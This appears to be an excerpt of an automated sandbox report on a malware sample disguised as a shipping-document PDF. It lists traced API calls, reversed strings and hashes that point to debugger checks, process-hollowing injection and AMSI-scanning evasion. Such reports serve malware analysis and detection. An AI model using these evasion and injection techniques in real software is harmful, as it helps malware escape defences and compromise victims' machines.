                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                          • API String ID: 35162468-539270669
                                                                                          • Opcode ID: b3f6ac52b76b7a7b90d34994e8193435984689d4f9adea0c82ffbaef8211bf26
                                                                                          • Instruction ID: 2db90a199f57092b6efd5d0def7d853f71936732e7f35f6e6d615a400bc66bad
                                                                                          • Opcode Fuzzy Hash: b3f6ac52b76b7a7b90d34994e8193435984689d4f9adea0c82ffbaef8211bf26
                                                                                          • Instruction Fuzzy Hash: 42F0207090024CBBEB23A7A8888ABDCFBAD6B0132AF640794E0A0620C1EB7007808751

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DBEB
                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DC1B
                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0294DC30
                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0294DC5C
                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0294DC65
                                                                                            • Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 2659941336-0
                                                                                          • Opcode ID: c6b6689a288fb729bf9f3131f1e4225d85f0665ebe03e1d908650c2d3c31a44f
                                                                                          • Instruction ID: 8a979ae9b20b1f6f35c47e22c2bdb71b8eb25449a1e51951af0a73659ded49ce
                                                                                          • Opcode Fuzzy Hash: c6b6689a288fb729bf9f3131f1e4225d85f0665ebe03e1d908650c2d3c31a44f
                                                                                          • Instruction Fuzzy Hash: B521D375A50708BAEB11EAE4CC46FDEB7BDAF88B00F510561F600F71C0DAB4AA058B65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0294E436
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckConnectionInternet
                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                          • API String ID: 3847983778-3852638603
                                                                                          • Opcode ID: c8a0c744243b7ad03a5e3b457d408cfe5760969f8c062d2b374e854c8edb9c2a
                                                                                          • Instruction ID: 7a0e78a737110830e5e15c7b3260ed870cecd3386f2b50e6d524e5a10d34b110
                                                                                          • Opcode Fuzzy Hash: c8a0c744243b7ad03a5e3b457d408cfe5760969f8c062d2b374e854c8edb9c2a
                                                                                          • Instruction Fuzzy Hash: C5410F71B501089BEB12EBA4DC41E9EB3FAFFCC724F625425E085A7240DE74AD018F65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DB9E), ref: 0294DB0B
                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DB45
                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DB72
                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DB7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AllocCloseCreateStringWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3308905243-0
                                                                                          • Opcode ID: 543e7aa04b592c9577b41a0813574187386ec6c651e721c81407fe978883ba20
                                                                                          • Instruction ID: f4c8d008a11fcb1359f46a5313d786d8cefb00cc4a11374978f1a88008a28995
                                                                                          • Opcode Fuzzy Hash: 543e7aa04b592c9577b41a0813574187386ec6c651e721c81407fe978883ba20
                                                                                          • Instruction Fuzzy Hash: 8821FF75A40308BAEB11EAE4CC46FDEB7BDEB44B04F514461B600F71C0DBB0AE048A65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948668
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                          • API String ID: 3130163322-2353454454
                                                                                          • Opcode ID: 8812309ba788897d1a7e0d7a1e162b70e81d59f3d23fad901ffe6f3eb94e8c28
                                                                                          • Instruction ID: 6700d2b5f4902d928765583d69e8ff8e6db3360e30b2adeffcae45b22bdcdfba
                                                                                          • Opcode Fuzzy Hash: 8812309ba788897d1a7e0d7a1e162b70e81d59f3d23fad901ffe6f3eb94e8c28
                                                                                          • Instruction Fuzzy Hash: DC11D3B6604208AFEB81EEACDD41F9E37EDFB8C714F524510FA08D7640DA34E9108B24
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                          • API String ID: 4072585319-445027087
                                                                                          • Opcode ID: 25952f7fe88b29020e8eece16f3236c254d54dc513a03ef722ae1a80fc88307e
                                                                                          • Instruction ID: 5cea3db392b1b4741a30e2cc0de9649e70e175747ea679af2f6bc2afb9eb50ae
                                                                                          • Opcode Fuzzy Hash: 25952f7fe88b29020e8eece16f3236c254d54dc513a03ef722ae1a80fc88307e
                                                                                          • Instruction Fuzzy Hash: 0C111B75644209AFEB11EFA8DC41EEEB7EDEB8D710F514861B904D7680DA30AA148B64
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                          • API String ID: 4072585319-445027087
                                                                                          • Opcode ID: b18558e15a4f53218225b6c6a793741b90302fe5c97cece4e61f723ee8c8ac0f
                                                                                          • Instruction ID: 44186583d89db82375b2330c3872a9dcec932b0a316003d8685c59ff0292cc91
                                                                                          • Opcode Fuzzy Hash: b18558e15a4f53218225b6c6a793741b90302fe5c97cece4e61f723ee8c8ac0f
                                                                                          • Instruction Fuzzy Hash: 28111B75644209AFEB11EFA4DC41EEEB7EDEB8D710F514861B504D7680DA30AA148B64
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                          • API String ID: 2521977463-737317276
                                                                                          • Opcode ID: e58e803560055788a338df71c8035b7f8c9a355ce66be2f6aedd8455714db2ba
                                                                                          • Instruction ID: 63bb954e7a7b7ba230c8de92007b8b0a5bd64ec85c47de7b8e9a36008b98a4ec
                                                                                          • Opcode Fuzzy Hash: e58e803560055788a338df71c8035b7f8c9a355ce66be2f6aedd8455714db2ba
                                                                                          • Instruction Fuzzy Hash: F9010075644209AFEB01EFA8DC51EAE77FEFB8D714F514460F908D7640DA70AD108B64
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                          • API String ID: 2719805696-3542721025
                                                                                          • Opcode ID: dae4376cdbf3954bcb1a055c62f8928849b4fd95d7eb727f9262f8539178ead2
                                                                                          • Instruction ID: 4867d9facfd51ac0479da5c41ae7a274557fbcc8a8023a7289266bba752f6dee
                                                                                          • Opcode Fuzzy Hash: dae4376cdbf3954bcb1a055c62f8928849b4fd95d7eb727f9262f8539178ead2
                                                                                          • Instruction Fuzzy Hash: 6E010C75614209AFEB01EFA8DC55EEEB7FDFB8D710F514860F508D7680DA70A9108B64
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 02948529
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                          • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                          • API String ID: 3503870465-2520021413
                                                                                          • Opcode ID: 15f8fb6009f42646dc2c3e7f57b7b9ff762d9d5fa028ed906992e17827ff32b5
                                                                                          • Instruction ID: d5084d0d8ed327946dab1b0b26f05f9ddb0ad61046525d00c24e3c294b8f2e03
                                                                                          • Opcode Fuzzy Hash: 15f8fb6009f42646dc2c3e7f57b7b9ff762d9d5fa028ed906992e17827ff32b5
                                                                                          • Instruction Fuzzy Hash: 81014F74A44304AFEF11EFA8DC51EAE77FEFB8D710F524860F40497640DA30A9108A24
                                                                                          APIs
                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0294DA6C
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DABE), ref: 0294DA82
                                                                                          • NtDeleteFile.NTDLL(?), ref: 0294DAA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFileInitStringUnicode
                                                                                          • String ID:
                                                                                          • API String ID: 3559453722-0
                                                                                          • Opcode ID: 46e05b4b3b6181d24654ae4aeae5e36490ae19cd04f2cb34697fb3a9317514fd
                                                                                          • Instruction ID: cdbeb5b953e8697a9684d3115f52623a0e66ab8cab2115864812e0eaf4b0dfe8
                                                                                          • Opcode Fuzzy Hash: 46e05b4b3b6181d24654ae4aeae5e36490ae19cd04f2cb34697fb3a9317514fd
                                                                                          • Instruction Fuzzy Hash: 8101FB79A48248AEEB06EAA08941FCD77B9AB85704F5144A3A254E6082DE74AB048B75
                                                                                          APIs
                                                                                            • Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA
                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0294DA6C
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DABE), ref: 0294DA82
                                                                                          • NtDeleteFile.NTDLL(?), ref: 0294DAA1
                                                                                            • Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                                          • String ID:
                                                                                          • API String ID: 2841551397-0
                                                                                          • Opcode ID: fb439d69fb3d15e43ec1e5e8189fd21b8aa2cc84c984b16bf5e832dda6cdbd51
                                                                                          • Instruction ID: b53c18fc99f920d429ce296295e972f2f7ed4cd687efc4e3bf472d696cb73239
                                                                                          • Opcode Fuzzy Hash: fb439d69fb3d15e43ec1e5e8189fd21b8aa2cc84c984b16bf5e832dda6cdbd51
                                                                                          • Instruction Fuzzy Hash: 5101F47594420CBADB11EBE0CD51FCEB3FDEB88700F514462E604F6180EB74AB048A74
                                                                                          APIs
                                                                                            • Part of subcall function 02946CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02946D41,?,?,?,00000000), ref: 02946D21
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02946E34,00000000,00000000,02946DB3,?,00000000,02946E23), ref: 02946D9F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromInstanceProg
                                                                                          • String ID:
                                                                                          • API String ID: 2151042543-0
                                                                                          • Opcode ID: 4068e35bc89739fb60a57772564df88bc5c18f61de1897331d12d1dffbcf0bcc
                                                                                          • Instruction ID: b940b29bc877725e005ae830b21b35fb0fd55c0935bf40acab4d1d32a6730cb0
                                                                                          • Opcode Fuzzy Hash: 4068e35bc89739fb60a57772564df88bc5c18f61de1897331d12d1dffbcf0bcc
                                                                                          • Instruction Fuzzy Hash: 3601A7B1608704AEE715DF64DC52D6B7BEDEBCAB10B524875F901D2680EA309A10C961
                                                                                          APIs
                                                                                          • InetIsOffline.URL(00000000,00000000,0295AFA1,?,?,?,000002F7,00000000,00000000), ref: 0294ECAE
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
